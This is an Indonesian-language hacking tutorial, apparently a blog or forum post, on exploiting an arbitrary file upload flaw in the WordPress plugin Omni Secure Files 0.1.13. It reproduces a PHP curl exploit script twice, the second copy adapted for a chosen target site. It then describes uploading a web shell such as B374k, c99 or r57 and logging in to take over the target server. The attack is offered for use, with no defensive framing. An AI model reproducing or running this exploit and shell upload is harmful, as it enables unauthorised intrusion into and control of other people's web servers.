erbagai plugin WordPress beberapa tahun ini terus banyak di exploitasi yang dimana penulis telah banyak memberikan contoh plugin-plugin wordpress yang mempunyai celah keamanan di blog ini, Disini penulis akan membahas praktek untuk cara mengexploitasi plugin Omni Secure Files Plugin 0.1.13 yang mempunyai celah keamanan Arbitrary File Upload.
Berikut ini adalah exploitnya yang dibuat oleh Adrien Thierry.
<?php
$u=”whatelse.php”;
$c = curl_init(“http://server/wp-content/plugins/omni-secure-files/plupload/examples/upload.php”);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘file’=>”@$u”,’name’=>”shell.php”));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
Ganti whatelse.php dengan shell.php dan target situsnya, sehingga misalnya sebagai berikut
<?php
$u=”shell.php”;
$c = curl_init(“http://situs.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php”);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘file’=>”@$u”,’name’=>”shell.php”));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
*Ganti situs.com dengan situs target.
Simpan source code tersebut dengan ekstensi PHP di satu folder dengan php.exe pada apache server, disini penulis menggunakan nama file hackk.php
Jangan lupa masukkan file shell.php juga ke dalam satu folder dengan php.exe juga yang bisa c99, r57, b374k, dll. Disini penulis menggunakan B374k saja.
Cara melakukan hacking :
Penulis memasukkan perintah : php hackk.php
[You must be registered and logged in to see this image.]Setelah dijalankan perintah diatas maka penulis tinggal masuk ke
[You must be registered and logged in to see this link.]Hasilnya adalah
[You must be registered and logged in to see this image.]Binggo, kita sudah masuk ke tampilan login php shell dari B374k, selanjutnya tinggal login dan mengakses server target melalui php shell dari B374k.
Oleh Kurniawan